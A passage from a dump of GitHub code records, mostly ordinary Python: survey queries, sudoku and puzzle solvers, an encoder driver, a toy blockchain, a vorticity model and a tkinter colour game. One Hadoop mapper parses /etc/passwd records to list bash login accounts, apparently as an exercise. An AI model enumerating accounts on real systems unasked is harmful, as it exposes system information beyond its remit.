estimated_total_records\n\n\ndef query_pending_survey_by_batch_no(batch_no, session):\n    \"\"\"\n    Query to return pending survey by batch no.\n    :param batch_no: UUID\n    :return: share surveys\n    \"\"\"\n    logger.info(\"Querying share_surveys\", batch_no=batch_no)\n    response = session.query(PendingSurveys).filter(PendingSurveys.batch_no == batch_no).all()\n    return response\n\n\ndef query_pending_survey_by_shared_by(shared_by, session):\n    \"\"\"\n    Query to return pending survey by shared by party id.\n    :param shared_by: UUID\n    :return: 
share surveys\n \"\"\"\n logger.info(\"Querying share_surveys\", shared_by=str(shared_by))\n response = session.query(PendingSurveys).filter(PendingSurveys.shared_by == shared_by).all()\n return response\n\n\ndef delete_pending_survey_by_batch_no(batch_no, session):\n \"\"\"\n Query to delete existing pending survey by batch no.\n :param batch_no: UUID\n :return: pending surveys\n \"\"\"\n logger.info(\"Querying share_surveys\", batch_no=batch_no)\n response = session.query(PendingSurveys).filter(PendingSurveys.batch_no == batch_no).delete()\n return response\n\n\ndef query_enrolment_by_survey_business_respondent(respondent_id, business_id, survey_id, session):\n \"\"\"\n Query to return enrolment based on respondent id, business id and survey\n\n :param respondent_id:\n :param business_id:\n :param survey_id:\n :return: enrolment for survey and business for respondent\n \"\"\"\n\n logger.info(\"Querying enrolment\", respondent_id=respondent_id, business_id=business_id, survey_id=survey_id)\n\n response = (\n session.query(Enrolment)\n .filter(\n and_(\n Enrolment.respondent_id == respondent_id,\n Enrolment.business_id == business_id,\n Enrolment.survey_id == survey_id,\n )\n )\n .first()\n )\n return response\n\n\ndef query_all_non_disabled_enrolments_respondent(respondent_id, session):\n \"\"\"\n Query to return all non disabled enrolments based on respondent id\n\n :param respondent_id: the id column from the respondent (integer not uuid)\n :return: enrolments for the respondent\n \"\"\"\n\n logger.info(\"Querying all enrolments for respondent\", respondent_id=respondent_id)\n\n response = (\n session.query(Enrolment)\n .filter(and_(Enrolment.respondent_id == respondent_id, Enrolment.status != \"DISABLED\"))\n .all()\n )\n return response\n\n\ndef count_enrolment_by_survey_business(business_id, survey_id, session):\n \"\"\"\n Query to return count of enrolments for given business id and survey\n\n :param business_id:\n :param survey_id:\n :return: Integer count of number of enrolments\n \"\"\"\n logger.info(\"Querying enrolment\", business_id=business_id, survey_id=survey_id)\n response = (\n session.query(Enrolment)\n .filter(\n and_(\n Enrolment.business_id == business_id,\n Enrolment.survey_id == survey_id,\n Enrolment.status == EnrolmentStatus.ENABLED,\n )\n )\n .count()\n )\n return response\n","repo_name":"ONSdigital/ras-party","sub_path":"ras_party/controllers/queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":22306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"43533677815","text":"class Solution:\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n rows = [set() for _ in range(9)]\n cols = [set() for _ in range(9)]\n blocks = [set() for _ in range(9)]\n\n for row in range(9):\n for col in range(9):\n num = board[row][col]\n if num == '.':\n continue\n\n curr_block = (row//3) * 3 + (col//3)\n # check for repitition\n if num in rows[row]:\n return False\n\n if num in cols[col]:\n return False\n\n if num in blocks[curr_block]:\n return False\n\n # add the current element\n rows[row].add(num)\n cols[col].add(num) \n blocks[curr_block].add(num)\n\n return True\n\n\n\n","repo_name":"yonass08/A2SV-Group-41","sub_path":"valid-sudoku.py","file_name":"valid-sudoku.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"73049725891","text":"#\n\n\"\"\"\n\"\"\"\n\nclass 
Revision:\n\t\"\"\"\n\t\"\"\"\n\n\t_ATTRS = ('a', 'b')\n\n\tdef __init__(self, api=None, **kwargs):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tfor k, v in kwargs.items():\n\t\t\tif k not in self._ATTRS:\n\t\t\t\tmsg = 'Unknown attribute given for Revision: {} (value: {})'.format(k, v)\n\t\t\t\traise AttributeError(msg)\n\n\t\t\tsetattr(self, k, v)\n","repo_name":"weirdgloop/cresbot","sub_path":"lib/mediawiki/revision.py","file_name":"revision.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10542178278","text":"import collections\nclass Solution:\n    def slidingPuzzle(self, board):\n        # https://leetcode-cn.com/problems/sliding-puzzle/solution/hua-dong-mi-ti-by-leetcode/\n        '''\n        BFS template\n        queue = collections.deque([(start, 0)])\n        seen = {start}\n        while queue:\n            node, depth = queue.popleft()\n            if node == target: return depth\n            for nei in neighbors(node):\n                if nei not in seen:\n                    seen.add(nei)\n                    queue.append((nei, depth+1))\n        '''\n        # Standard BFS template -- same routine as iterative (non-recursive) tree traversal\n        m, n = len(board), len(board[0])\n        board = tuple([x for i in range(m) for x in board[i]])\n        queue = collections.deque([(board, board.index(0), 0)])\n        target = tuple(list(range(1, m * n)) + [0])\n        seen = {board}\n        while queue:\n            cur, idx, step = queue.popleft()\n            if cur == target:\n                return step\n            for d in [-1, 1, n, -n]:\n                new_idx = idx + d\n                if abs(new_idx // n - idx // n) + abs(new_idx % n - idx % n) != 1: continue  # e.g. 2+1=3 would wrap from the end of one row to the start of the next, so that move is not allowed\n                if new_idx < 0 or new_idx >= m * n: continue\n                new_board = list(cur)\n                new_board[idx], new_board[new_idx] = new_board[new_idx], new_board[idx]\n                new_board = tuple(new_board)\n                if new_board not in seen:\n                    seen.add(new_board)\n                    queue.append((new_board, new_idx, step + 1))\n        return -1\n","repo_name":"BUAAChuanWang/Coding","sub_path":"03_BFS/773. 
滑动谜题.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"69914381571","text":"import math\r\n\r\nvezes = int(input(\"\"))\r\nif vezes > 500 or vezes < 1:\r\n exit(1)\r\nfor i in range(vezes):\r\n l, r = map(int, input(\"\").split())\r\n achou=-1\r\n for i in range(1,r):\r\n for j in range(1,r):\r\n if i+j>l and i+j 100 and dtime < 1000):\n if self.increment == 1:\n self.increment = 10\n elif self.increment == 10:\n self.increment = 100\n elif self.increment == 100:\n self.increment = 1\n self.buttontime = 0\n self.arg[2] = self.increment\n elif self.sw_pin.value() and dtime > 1000:\n self.buttontime = 0\n self.arg[0] = 0\n self.arg[1] = 0\n micropython.schedule(self.call_handlers, [self.arg])\n \n def add_handler(self, handler):\n self.handlers.append(handler)\n \n def call_handlers(self, value):\n for handler in self.handlers:\n handler(value)","repo_name":"heli2src/GRBL_MPG_DRO_with_Teensy_and_mpgWheels","sub_path":"src/mpg_wheel/RP2040/rotary.py","file_name":"rotary.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"23482778361","text":"#fh=open(\"/etc/passwd\",\"r\")\nimport sys\nfh = sys.stdin\nfor line in fh:\n line=line.strip()\n userdb=line.split(\":\")\n uid=userdb[2]\n shell=userdb[6]\n if int(uid) <= 1000 and shell == \"/bin/bash\":\n print(line)\nfh.close()\n","repo_name":"shubhambhardwaj007/Hadoop-Mapreduce-Program","sub_path":"user_login/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"4672980169","text":"import hashlib as hasher\r\nimport datetime as date\r\nimport pprint\r\n\r\n\r\nclass Block:\r\n def __init__( self, index, data, previous_hash ):\r\n self.index = index\r\n self.timestamp = date.datetime.now()\r\n self.data = data\r\n self.previous_hash = previous_hash\r\n self.nonce, self.hash = self.compute_hash_with_proof_of_work()\r\n\r\n def compute_hash_with_proof_of_work( self, difficulty=\"00\" ):\r\n nonce = 0\r\n while True: \r\n hash = self.calc_hash_with_nonce( nonce )\r\n if hash.startswith( difficulty ):\r\n return [nonce,hash] \r\n else:\r\n nonce += 1 \r\n\r\n def calc_hash_with_nonce( self, nonce=0 ):\r\n sha = hasher.sha256()\r\n sha.update(str(nonce).encode(\"utf-8\") +\r\n str(self.index).encode(\"utf-8\") +\r\n str(self.timestamp).encode(\"utf-8\") +\r\n str(self.data).encode(\"utf-8\") +\r\n str(self.previous_hash).encode(\"utf-8\"))\r\n return sha.hexdigest()\r\n\r\n\r\n def __repr__( self ):\r\n return \"Block<\\n index: {},\\n timestamp: {},\\n data: {},\\n previous_hash: {},\\n nonce: {},\\n hash: {}>\".format(\r\n self.index, self.timestamp, self.data, self.previous_hash, self.nonce, self.hash)\r\n\r\n\r\n @staticmethod\r\n def first( data=\"Genesis\" ):\r\n return Block( 0, data, \"0\" )\r\n\r\n @staticmethod\r\n def next( previous, data=\"Transaction Data...\" ):\r\n return Block( previous.index+1, data, previous.hash )\r\n\r\n\r\n\r\n\r\n\r\nb0 = Block.first( \"Genesis\" )\r\nb1 = Block.next( b0, \"Transaction Data...\" )\r\nb2 = Block.next( b1, \"Transaction Data......\" )\r\nb3 = Block.next( b2, \"More Transaction Data...\" )\r\n\r\n\r\nblockchain = [b0, b1, b2, b3]\r\n\r\npprint.pprint( blockchain 
)\r\n","repo_name":"GustavoDuregger/blockchain","sub_path":"blockchain.py/proof_of_work.py","file_name":"proof_of_work.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"44091505891","text":"# https://www.hackerrank.com/challenges/gem-stones/problem\n\nn = int(input())\narr = [set(input()) for _ in range(n)]\nsub = arr[0]\n\nfor a in arr:\n sub.intersection_update(a)\n\nprint(len(sub))\n","repo_name":"JaredLGillespie/HackerRank","sub_path":"Python/gem-stones.py","file_name":"gem-stones.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"43"} +{"seq_id":"3930830815","text":"# This script is an older standalone verion of BVEX. It is included here for \n# demonstrating the chaos in this system. If you compare results from this\n# code and the current code, you will find that at t=30 notable differences\n# appear, and by t=50 they look significantly different. \n# This code carries wave coefficient as model state while the lastest \n# version carries vorcticity in physical space.\n\n\nimport jax\nimport jax.numpy as jnp\nfrom jax.numpy.fft import fft2, ifft2\nimport numpy.fft as nfft\nimport netCDF4 as nc4\nfrom namelist import *\n\nimport time\n\n\n# timers for performance evaluation\ntimerSetup = 0.0\ntimerRelay1 = 0.0 # first relay\ntimerRelayO = 0.0 # other relays\ntimerWrite = 0.0\nwalltime = time.time()\n\n\ndef setup_ic_grid(shear_frac, rand_seed):\n \"\"\" Setup initial conditions \"\"\"\n\n x1d = np.linspace(2.0 * np.pi / nx / 2, 2.0 * np.pi - 2.0 * np.pi / nx / 2, nx)\n y1d = np.linspace(2.0 * np.pi / ny / 2, 2.0 * np.pi - 2.0 * np.pi / ny / 2, ny)\n x2d, y2d = np.meshgrid(x1d, y1d, indexing=\"ij\")\n\n tmp1 = np.linspace(0, nx / 2 - 1, int(np.around(nx / 2))) * 2 * np.pi / lx\n tmp2 = np.linspace(-nx / 2, -1, int(np.around(nx / 2))) * 2 * np.pi / lx\n kx1d = np.concatenate((tmp1, tmp2))\n tmp1 = np.linspace(0, ny / 2 - 1, int(np.around(ny / 2))) * 2 * np.pi / ly\n tmp2 = np.linspace(-ny / 2, -1, int(np.around(ny / 2))) * 2 * np.pi / ly\n ky1d = np.concatenate((tmp1, tmp2))\n kx2d, ky2d = np.meshgrid(kx1d, ky1d, indexing=\"ij\")\n k2 = kx2d * kx2d + ky2d * ky2d\n del2 = -k2\n del2[0, 0] = 1\n\n # #---------------------------\n # # Purely random noise; for Komogorov flow or others \n # q_0 = np.zeros((nx, ny)) \n # q0_h = fft2(q_0) \n # p0_h = q0_h / del2 \n # p_0 = np.real(ifft2(p0_h)) \n # np.random.seed(rand_seed) \n # q_0 = q_0 + (np.random.uniform(0.0, 1.0, (nx, ny)) - 0.5) / 10.0 \n # #---------------------------\n\n #---------------------------\n # Shear zone setup for simpler Kelvin-Helmholtz instability\n q_0 = -(shear_frac / (2 * shear_frac - 1)) * np.sin(\n np.pi - (2 * shear_frac / (2 * shear_frac - 1) * y2d)\n )\n q_0[\n (y2d >= (2 * shear_frac - 1) / (2 * shear_frac) * np.pi)\n & (y2d <= (2 * shear_frac + 1) / (2 * shear_frac) * np.pi)\n ] = (2 * shear_frac / np.pi)\n q_0[y2d > (2 * shear_frac + 1) * np.pi / (2 * shear_frac)] = -(\n shear_frac / (2 * shear_frac - 1)\n ) * np.sin(\n (2 * shear_frac)\n / (2 * shear_frac - 1)\n * y2d[y2d > (2 * shear_frac + 1) * np.pi / (2 * shear_frac)]\n - (2 * shear_frac + 1) / (2 * shear_frac - 1) * np.pi\n )\n q0_h = fft2(q_0)\n p0_h = q0_h / del2\n p_0 = np.real(ifft2(p0_h))\n np.random.seed(rand_seed)\n q_0 = q_0 + (np.random.uniform(0.0, 1.0, (nx, ny)) - 0.5) / 10.0 * np.max(\n np.abs(q_0)\n )\n #---------------------------\n\n return q_0, p_0, 
kx2d, ky2d, del2, x2d, y2d, x1d, y1d\n\n\ndef rhs_tendency(q_hat, t_now, del2, kx2d, ky2d, p0, y2d):\n \"\"\" Compute the RHS tendency due to advection and forcing \"\"\"\n p_hat = q_hat / del2\n q = jnp.real(ifft2(q_hat))\n dpdx = jnp.real(ifft2(1j * kx2d * p_hat))\n dpdy = jnp.real(ifft2(1j * ky2d * p_hat))\n dqdx = jnp.real(ifft2(1j * kx2d * q_hat))\n dqdy = jnp.real(ifft2(1j * ky2d * q_hat))\n\n adv = dpdx * dqdy - dpdy * dqdx\n adv_hat = fft2(adv)\n \n # #---------------------------\n # # Komogorov forcing\n # u_forcing = np.sin(4.0*y2d) \n # forcing_hat = -1j * ky2d * nfft.fft2(u_forcing)\n # #---------------------------\n\n #---------------------------\n # Simple shear zone forcing\n p_now = jnp.real(ifft2(p_hat))\n forcing = (\n -alpha\n * (p_now - p0)\n * ((1.0 - jnp.cos(t_now / 5.0 * jnp.pi)) / 2.0) ** 4.0\n * (((1.0 - jnp.cos(y2d)) / 2.0) ** 4 + 1.0 / 24.0)\n * (24.0 / 25.0)\n )\n forcing_hat = del2 * fft2(forcing)\n #---------------------------\n\n rhs = -adv_hat + forcing_hat\n\n return rhs\n\n\n@jax.jit\ndef edtrk4(q_hat, t_now):\n \"\"\" Integrate the model for one step with the EDTRK4 scheme \"\"\"\n # https://github.com/navidcy/barotropic_QG\n\n # Define model parameters as numpy arrays so that they become static later\n # obtain p0 and wavenumber info from setupICs\n _, p0, kx2d, ky2d, del2, x2d, y2d, _, _ = setup_ic_grid(shearFrac, randSeed)\n\n k2 = kx2d * kx2d + ky2d * ky2d\n\n s = 4\n k = np.sqrt(k2)\n k_max = ny / 2\n k_max_s = k_max * (lx / nx)\n k_cut = 2 / 3 * k_max\n k_cut_s = k_cut * (ly / ny)\n a = -np.log(1e-15) / ((k_max_s - k_cut_s) ** s) * ((ly / ny) ** s)\n mask = np.ones((nx, ny)) * np.abs(k <= ny / 3) + np.exp(\n -a * (k - k_cut) ** s\n ) * np.abs(k > ny / 3)\n # Calculate coefficients for the EDTRK4 algorithm \"\"\"\n lin = -mu - nu * k2 ** 2\n e_lin = np.exp(lin * dt)\n e_lin2 = np.exp(lin * dt / 2)\n m_pts = 64\n r = np.exp(2j * np.pi / m_pts * np.linspace(1, m_pts, m_pts))\n fu = np.zeros((nx, ny))\n fab = fu\n fc = fu\n h_2 = fu # in the limit lin->0, this coefficient becomes dt/2\n for m in range(0, m_pts):\n z = r[m] + lin * dt\n h_2 = h_2 + dt * (np.exp(z / 2) - 1) / z\n fu = fu + dt * (-4 - z + np.exp(z) * (4 - 3 * z + z ** 2)) / z ** 3\n fab = fab + dt * (+2 + z + np.exp(z) * (-2 + z)) / z ** 3\n fc = fc + dt * (-4 - 3 * z - z ** 2 + np.exp(z) * (4 - z)) / z ** 3\n fu = fu / m_pts\n fab = fab / m_pts\n fc = fc / m_pts\n h_2 = h_2 / m_pts\n\n # integration for one step\n nlin0_z = rhs_tendency(q_hat, t_now, del2, kx2d, ky2d, p0, y2d)\n k1z = e_lin2 * q_hat + h_2 * nlin0_z\n nlin1_z = rhs_tendency(k1z, t_now, del2, kx2d, ky2d, p0, y2d)\n k2z = e_lin2 * q_hat + h_2 * nlin1_z\n nlin2_z = rhs_tendency(k2z, t_now, del2, kx2d, ky2d, p0, y2d)\n k3z = e_lin2 * k1z + h_2 * (2 * nlin2_z - nlin0_z)\n nlin3_z = rhs_tendency(k3z, t_now, del2, kx2d, ky2d, p0, y2d)\n\n q_h_new = (\n e_lin * q_hat + fu * nlin0_z + 2 * fab * (nlin1_z + nlin2_z) + fc * nlin3_z\n )\n\n q_h_new = q_h_new * mask\n\n t_new = jnp.around(t_now + dt, 6)\n return q_h_new, t_new\n\n\n@jax.jit\ndef sprint(physics_state, _):\n \"\"\" Integrate the model for nSteps steps \"\"\"\n\n q_hat, t_now = jnp.split(physics_state, 2, axis=0)\n t_set = jnp.real(t_now[0, 0, 0]) + np.arange(nSteps) * dt\n\n q_hat_new, t_set_new = jax.lax.scan(edtrk4, jnp.squeeze(q_hat), t_set)\n\n t_new = jnp.around(jnp.full((nx, ny), t_set_new[-1]), 6)\n physics_state_new = jnp.stack((q_hat_new, t_new), axis=0)\n # both outputs have q_hat_new, but only the second will be stacked if this\n # function is scanned by 
another function\n return physics_state_new, q_hat_new\n\n\n@jax.jit\ndef relay(_, physics_state):\n \"\"\" Run a number of sprints to obtain n_sprints output slices \n\n physics_state is the I.C. for a given time. The function integrates for \n nSprints*nSteps*dt time and saves nSprints output slices.\n\n ``carry`` (_) is a dummy argument for now. \n \n In standalone integration, physics_state_end can be used for the next loop\n (using while or for).\n \"\"\"\n\n # Integrate the model for nSprints\n physics_state_end, q_hat_set = jax.lax.scan(\n sprint, physics_state, None, length=nSprints\n )\n return physics_state_end, q_hat_set\n\n\n@jax.jit\ndef race(physics_state_batch):\n \"\"\" Apply ``relay`` to a batch of physics states\n\n Output q_hat_batch[batch, time_slices, x, y]\n \"\"\"\n\n # Integrate the batch for nSprints each\n carry = physics_state_batch[0]\n _, q_hat_batch = jax.lax.scan(relay, carry, physics_state_batch)\n\n return q_hat_batch\n\n\ndef write2ncfile(time_rec, zeta_rec, psi_rec, ix, iy):\n \"\"\" Write data to a NetCDF file \"\"\"\n start_time = time_rec[0]\n end_time = time_rec[-1]\n filename = fileNameFormat % (start_time, end_time)\n ncfile = nc4.Dataset(filename, mode=\"w\", format=\"NETCDF4\")\n ncfile.createDimension(\"y\", ny)\n ncfile.createDimension(\"x\", nx)\n ncfile.createDimension(\"time\", None)\n\n y_nc = ncfile.createVariable(\"y\", np.float32, (\"y\",))\n y_nc.long_name = \"y\"\n x_nc = ncfile.createVariable(\"x\", np.float32, (\"x\",))\n x_nc.long_name = \"x\"\n itime = ncfile.createVariable(\"time\", np.float32, (\"time\",))\n itime.long_name = \"time\"\n\n zeta = ncfile.createVariable(\n \"zeta\", np.float32, (\"time\", \"y\", \"x\"), fill_value=1.0e36\n )\n zeta.long_name = \"vorticity\"\n\n psi = ncfile.createVariable(\n \"psi\", np.float32, (\"time\", \"y\", \"x\"), fill_value=1.0e36\n )\n psi.standard_name = \"streamfunction\"\n\n x_nc[:] = ix\n y_nc[:] = iy\n zeta[:, :, :] = zeta_rec[:, :, :]\n psi[:, :, :] = psi_rec[:, :, :]\n itime[:] = time_rec[:]\n\n ncfile.close()\n return filename\n\n\n#=====================================================\n# Main body\n\n# Create array to save data (for ML training these need to be stacked/concatenated jnp arrays)\nnumRec = np.min([1000, nSprints]).astype(int)\nzetaRec = np.empty((numRec, ny, nx), dtype=np.float32)\npsiRec = np.empty((numRec, ny, nx), dtype=np.float32)\ntimeRec = np.empty((numRec,), dtype=np.float32)\n\ntimerSetup = time.time() - walltime + timerSetup\nwalltime = time.time()\n\n# Start the integration\ntimerSetup = time.time() - walltime + timerSetup\nwalltime = time.time()\n\nq0, _, Kx, Ky, Del2, _, _, x, y = setup_ic_grid(shearFrac, randSeed)\n\nif isRestart: \n dsFile = nc4.Dataset(restartFile)\n zeta = np.copy(dsFile.variables[\"zeta\"]).astype(\"float32\")\n q0 = np.transpose(zeta[-1]).astype(\"float32\")\n ncTime = np.copy(dsFile.variables[\"time\"]).astype(\"float32\")\n qHat = fft2(q0) \n time2d = np.zeros((nx, ny), dtype=np.complex64) + ncTime[-1].astype(np.complex64)\nelse:\n qHat = fft2(q0) \n time2d = np.zeros((nx, ny), dtype=np.complex64) \n\n\nphysicsState = jnp.stack((qHat, time2d), axis=0)\n\nit = 0\niTotal = np.around(t_max / dt).astype(int)\n\n\nwhile it < iTotal:\n physicsState, qHatSet = relay(None, physicsState)\n\n if it < (nSteps * nSprints - 1):\n timerRelay1 = time.time() - walltime + timerRelay1\n walltime = time.time()\n else:\n timerRelayO = time.time() - walltime + timerRelayO\n walltime = time.time()\n\n it = it + nSteps * nSprints\n\n # record data\n q = 
np.real(nfft.ifft2(qHatSet))\n pHatSet = qHatSet / Del2\n p = np.real(nfft.ifft2(pHatSet))\n u = np.real(nfft.ifft2(-1j * Ky * pHatSet))\n v = np.real(nfft.ifft2(+1j * Kx * pHatSet))\n cfl = np.sqrt(np.max(u ** 2 + v ** 2)) * dt / dx\n print((\"Relay #%4i; CFL =%5.2f \" % (int(it / nSteps / nSprints), cfl)))\n zetaRec = np.transpose(q, axes=[0, 2, 1]).astype(\"float32\")\n psiRec = np.transpose(p, axes=[0, 2, 1]).astype(\"float32\")\n _, time2d = physicsState\n timeRec = np.real(time2d[0, 0]) + np.arange(-nSprints + 1, 1) * dt * nSteps\n # writing to a file when having numRec slices\n fileName = write2ncfile(timeRec, zetaRec, psiRec, x, y)\n print(\"File saved: \" + fileName)\n\n timerWrite = time.time() - walltime + timerWrite\n walltime = time.time()\n\n\nprint(\"Successful completion of integration\\n\")\n\n\nprint(\"Completion of integration\\n\")\n\nprint(\"Setup: %10.6f\" % timerSetup)\nprint(\"1st Relay: %10.6f\" % timerRelay1)\nprint(\"Other %3i: %10.6f\" % (iTotal / nSprints / nSteps - 1, timerRelayO))\nprint(\"Writing Data:%10.6f\" % timerWrite)\n\n","repo_name":"YONGQUAN-QU/BVEX","sub_path":"old_standalone_ref.py","file_name":"old_standalone_ref.py","file_ext":"py","file_size_in_byte":11538,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"69923440129","text":"N, M, V = map(int,input().split())\n\nedges = [[0]*(N+1) for _ in range(N+1)]\nvisited = [0]*(N+1)\n\nfor i in range(M):\n x, y = map(int,input().split())\n edges[x][y] = 1\n edges[y][x] = 1\n\nans = []\n\ndef DFS(n):\n global N, ans\n ans.append(n)\n visited[n] = 1\n for i in range(N+1):\n if edges[n][i] == 1 and visited[i] == 0:\n DFS(i)\n\ndef BFS(n):\n global N, ans, visited\n if n == []:\n return\n\n ans = ans + n\n checked = []\n for i in n:\n visited[i] = 1\n for j in range(N+1):\n if edges[i][j] == 1 and visited[j] == 0:\n visited[j] = 1\n checked.append(j)\n \n BFS(checked)\n\nDFS(V)\nprint(*ans)\nvisited = [0]*(N+1)\nans = []\n\nvisited[V] = 1\nBFS([V])\nprint(*ans)","repo_name":"starga2er/-","sub_path":"2.24/1260.py","file_name":"1260.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"25307106802","text":"# informations liées au groupe: Cyrian COURCHAMP, Antoine COUSTENOBLE, Bryan AECK, Matteo COTARD, Sofiya RUGA\n#Groupe: BITD03\n# Github: https://github.com/uvsq22003905/IN200-Projet2\n\n\nimport tkinter as tk\nimport random as rd\n\n\n#fonctions\n\ndef start():\n #démarre le jeu niveau 1 en envoyant la fonction du décompte du temps et de l'affichage des boutons de couleur et du mot\n decompte()\n affichage_boutons()\n\n\ndef start_niveau2():\n #démarre le jeu niveau 2 en envoyant la fonction du décompte du temps, de l'affichage des boutons de couleur et de l'affichage des 3 mots\n decompte2()\n affichage_boutons2()\n affichage_mots_multiples()\n\n\n##Partie faite par Mattéo et Bryan\n\ndef reinitialiser():\n #réinitialise le jeu niveau 1 en effaçant le dernier mot et en remettant le compte à rebours au temps maximum et le score à 0\n global compteur_rebours, compteur, ScoreLabel2,timerLabel2, Mot, a, list_affich_mots\n compteur=0\n compteur_rebours=20\n Mot.destroy()\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n timerLabel2.destroy()\n timerLabel2= tk.Label(racine, text=compteur_rebours,font=(\"papyrus\",11))\n timerLabel2.place(x=360, y=110)\n a=0\n\n\ndef 
reinitialiser2():\n #réinitialise le jeu niveau 2 en effaçant les 3 mots et en remettant le compte à rebours au temps maximum et le score à 0\n global compteur_rebours, compteur, ScoreLabel2,timerLabel2, a, list_affich_mots\n compteur=0\n compteur_rebours=20\n for i in range (0,3):\n list_affich_mots[i].destroy()\n list_affich_mots = []\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n timerLabel2.destroy()\n timerLabel2= tk.Label(racine, text=compteur_rebours,font=(\"papyrus\",11))\n timerLabel2.place(x=360, y=110)\n a=0\n\n##Partie faite par Sofiya\n\ndef affichage_boutons():\n #affiche les boutons de couleur et le mot pour le niveau 1\n global Mot, a\n Boutonred=tk.Button(racine, text=listCo[0],background=\"red\",command=red) #Boutons usuels\n Boutonred.place(x=118,y=280)\n Boutonblue=tk.Button(racine, text=listCo[1],background=\"blue\",command=blue) #Boutons usuels\n Boutonblue.place(x=158,y=280)\n Boutongreen=tk.Button(racine, text=listCo[2],background=\"green\",command=green) #Boutons usuels\n Boutongreen.place(x=203,y=280)\n Boutonpink=tk.Button(racine, text=listCo[3],background=\"pink\",command=pink) #Boutons usuels\n Boutonpink.place(x=256,y=280)\n Boutonorange=tk.Button(racine, text=listCo[4],background=\"orange\",command=orange) #Boutons usuels\n Boutonorange.place(x=299,y=280)\n Boutonyellow=tk.Button(racine, text=listCo[5],background=\"yellow\",command=yellow) #Boutons usuels\n Boutonyellow.place(x=363,y=280)\n Boutonwhite=tk.Button(racine, text=listCo[6],background=\"white\",command=white) #Boutons usuels\n Boutonwhite.place(x=425,y=280)\n Mot=tk.Label(racine, text=listNo[Rand2],foreground=listCo[Rand],font=(\"Arial\",30))\n Mot.place(x=250,y=150)\n a=1\n\n##Partie faite par Bryan\n\ndef decompte():\n #lance le compte à rebours pour le niveau 1 et quand il arrive à 0 enregistre le score dans le fichier scores\n global compteur_rebours, timerLabel2, compteur, list_scores\n if compteur_rebours!=0:\n compteur_rebours-=1\n timerLabel2.destroy()\n timerLabel2= tk.Label(racine, text=compteur_rebours,font=(\"papyrus\",11))\n timerLabel2.place(x=360, y=110)\n canvas.after(1000,decompte)\n if compteur_rebours==0:\n fic = open (\"scores.txt\", \"r\")\n ligne = fic.readline()\n list_scores=ligne.split()\n for i in range (0,len(list_scores)):\n list_scores[i]=int(list_scores[i])\n fic.close()\n fic = open (\"scores.txt\", \"w\")\n list_scores.append(compteur)\n for i in range (0,len(list_scores)):\n fic.write(str(list_scores[i])+\" \")\n fic.close()\n\n\ndef decompte2():\n #lance le compte à rebours pour le niveau 2 et quand il arrive à 0 enregistre le score dans le fichier scores_niveau2\n global compteur_rebours, timerLabel2, compteur, list_scores2\n if compteur_rebours!=0:\n compteur_rebours-=1\n timerLabel2.destroy()\n timerLabel2= tk.Label(racine, text=compteur_rebours,font=(\"papyrus\",11))\n timerLabel2.place(x=360, y=110)\n canvas.after(1000,decompte2)\n if compteur_rebours==0:\n fic2 = open (\"scores_niveau2.txt\", \"r\")\n ligne = fic2.readline()\n list_scores2=ligne.split()\n for i in range (0,len(list_scores2)):\n list_scores2[i]=int(list_scores2[i])\n fic2.close()\n fic2 = open (\"scores_niveau2.txt\", \"w\")\n list_scores2.append(compteur)\n for i in range (0,len(list_scores2)):\n fic2.write(str(list_scores2[i])+\" \")\n fic2.close()\n\n##Partie faite par Cyrian\n\ndef red():\n #niveau 1: ajoute un point au score si le mot était rouge et lance la fonction du changement de mot\n global compteur, 
ScoreLabel2, Rand, a\n if Rand==0 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n changement_mot()\n\ndef blue():\n #niveau 1: ajoute un point au score si le mot était bleu et lance la fonction du changement de mot\n global compteur, ScoreLabel2, Rand, compteur_rebours, a\n if Rand==1 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n Mot.destroy()\n changement_mot()\n\ndef green():\n #niveau 1: ajoute un point au score si le mot était vert et lance la fonction du changement de mot\n global compteur, ScoreLabel2, Rand, a\n if Rand==2 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n changement_mot()\n\ndef pink():\n #niveau 1: ajoute un point au score si le mot était rose et lance la fonction du changement de mot\n global compteur, ScoreLabel2, Rand, a\n if Rand==3 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n 